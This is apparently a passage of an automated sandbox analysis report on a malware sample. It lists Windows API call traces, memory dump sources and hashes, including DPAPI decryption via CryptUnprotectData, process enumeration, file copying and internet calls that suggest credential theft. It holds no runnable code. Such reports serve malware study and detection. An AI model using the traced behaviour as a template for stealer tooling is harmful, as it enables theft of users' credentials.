                                                                                                                                                          • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                          • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                          • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                          • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                          • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                          • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                          • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                          • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                                                                        • String ID: E.A
                                                                                                                                                        • API String ID: 1035121393-2211245587
                                                                                                                                                        • Opcode ID: 49a92f44dda008f29ff3be1199fba4f2435d2cff060490da4c1bc1825e576d3b
                                                                                                                                                        • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                                                                        • Opcode Fuzzy Hash: 49a92f44dda008f29ff3be1199fba4f2435d2cff060490da4c1bc1825e576d3b
                                                                                                                                                        • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • strtok_s.MSVCRT ref: 00411378
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        • strtok_s.MSVCRT ref: 0041146F
                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpystrtok_s$lstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3184129880-0
                                                                                                                                                        • Opcode ID: ebd071ba295f9e6345a8f1ce033e7ea8a96eb40d49cbc6ef6f62b0c380326253
                                                                                                                                                        • Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
                                                                                                                                                        • Opcode Fuzzy Hash: ebd071ba295f9e6345a8f1ce033e7ea8a96eb40d49cbc6ef6f62b0c380326253
                                                                                                                                                        • Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                          • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                          • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                          • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                          • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                          • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                          • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,043363A8), ref: 0040971B
                                                                                                                                                          • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                          • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                          • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                          • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                        • memcmp.MSVCRT ref: 00409774
                                                                                                                                                          • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                          • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                          • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                        • String ID: $DPAPI
                                                                                                                                                        • API String ID: 2647593125-1819349886
                                                                                                                                                        • Opcode ID: 9501cc2230a19d62742dd6fac07f5f7f22815d6b42f4b3c90aed0b997707f15c
                                                                                                                                                        • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                                                                        • Opcode Fuzzy Hash: 9501cc2230a19d62742dd6fac07f5f7f22815d6b42f4b3c90aed0b997707f15c
                                                                                                                                                        • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3491751439-0
                                                                                                                                                        • Opcode ID: b217f11ee595118c12510416ca198f6e5f4cd8a2818699d74d2b05badb52671e
                                                                                                                                                        • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                        • Opcode Fuzzy Hash: b217f11ee595118c12510416ca198f6e5f4cd8a2818699d74d2b05badb52671e
                                                                                                                                                        • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                        • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CloseCreateHandleSize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378416451-0
                                                                                                                                                        • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                        • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                        • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                        • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0432E458,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                        • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,?,0432E458,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 941982115-0
                                                                                                                                                        • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                        • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                                                                        • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                        • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: Pi@
                                                                                                                                                        • API String ID: 0-1360946908
                                                                                                                                                        • Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                        • Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
                                                                                                                                                        • Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                        • Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                        • String ID: <
                                                                                                                                                        • API String ID: 3848002758-4251816714
                                                                                                                                                        • Opcode ID: 37ed0ca631367af82f36f63dd07d4b086523e6c9a941f75142a47ca63166a19e
                                                                                                                                                        • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                                                                        • Opcode Fuzzy Hash: 37ed0ca631367af82f36f63dd07d4b086523e6c9a941f75142a47ca63166a19e
                                                                                                                                                        • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,043306C0), ref: 0040EFCE
                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04330530), ref: 0040F06F
                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04330520), ref: 0040F17E
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3722407311-0
                                                                                                                                                        • Opcode ID: 31078a274c7ecb916f7a8f6683db220afe1a3ed558bf997ca1166e5725c4bf32
                                                                                                                                                        • Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
                                                                                                                                                        • Opcode Fuzzy Hash: 31078a274c7ecb916f7a8f6683db220afe1a3ed558bf997ca1166e5725c4bf32
                                                                                                                                                        • Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,043306C0), ref: 0040EFCE
                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04330530), ref: 0040F06F
                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,04330520), ref: 0040F17E
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3722407311-0
                                                                                                                                                        • Opcode ID: 572c9ad16ab8822ac46bcb40876d0a65d15739239fcb8d820afb305b4ebff93d
                                                                                                                                                        • Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
                                                                                                                                                        • Opcode Fuzzy Hash: 572c9ad16ab8822ac46bcb40876d0a65d15739239fcb8d820afb305b4ebff93d
                                                                                                                                                        • Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0041281A
                                                                                                                                                        • lstrcat.KERNEL32(?,04337050), ref: 00412838
                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                          • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                          • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                          • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
                                                                                                                                                          • Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,04330840), ref: 0041269B
                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
                                                                                                                                                          • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
                                                                                                                                                          • Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
                                                                                                                                                          • Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779
                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                        • String ID: 00A
                                                                                                                                                        • API String ID: 2104210347-95910775
                                                                                                                                                        • Opcode ID: c2aab32bc768535aa461f5625e9143b12642d6fe0ed55be40c744e8f67642cc8
                                                                                                                                                        • Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
                                                                                                                                                        • Opcode Fuzzy Hash: c2aab32bc768535aa461f5625e9143b12642d6fe0ed55be40c744e8f67642cc8
                                                                                                                                                        • Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6B073095
                                                                                                                                                          • Part of subcall function 6B0735A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6B0FF688,00001000), ref: 6B0735D5
                                                                                                                                                          • Part of subcall function 6B0735A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6B0735E0
                                                                                                                                                          • Part of subcall function 6B0735A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6B0735FD
                                                                                                                                                          • Part of subcall function 6B0735A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6B07363F
                                                                                                                                                          • Part of subcall function 6B0735A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6B07369F
                                                                                                                                                          • Part of subcall function 6B0735A0: __aulldiv.LIBCMT ref: 6B0736E4
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B07309F
                                                                                                                                                          • Part of subcall function 6B095B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6B0956EE,?,00000001), ref: 6B095B85
                                                                                                                                                          • Part of subcall function 6B095B50: EnterCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095B90
                                                                                                                                                          • Part of subcall function 6B095B50: LeaveCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095BD8
                                                                                                                                                          • Part of subcall function 6B095B50: GetTickCount64.KERNEL32 ref: 6B095BE4
                                                                                                                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6B0730BE
                                                                                                                                                          • Part of subcall function 6B0730F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6B073127
                                                                                                                                                          • Part of subcall function 6B0730F0: __aulldiv.LIBCMT ref: 6B073140
                                                                                                                                                          • Part of subcall function 6B0AAB2A: __onexit.LIBCMT ref: 6B0AAB30
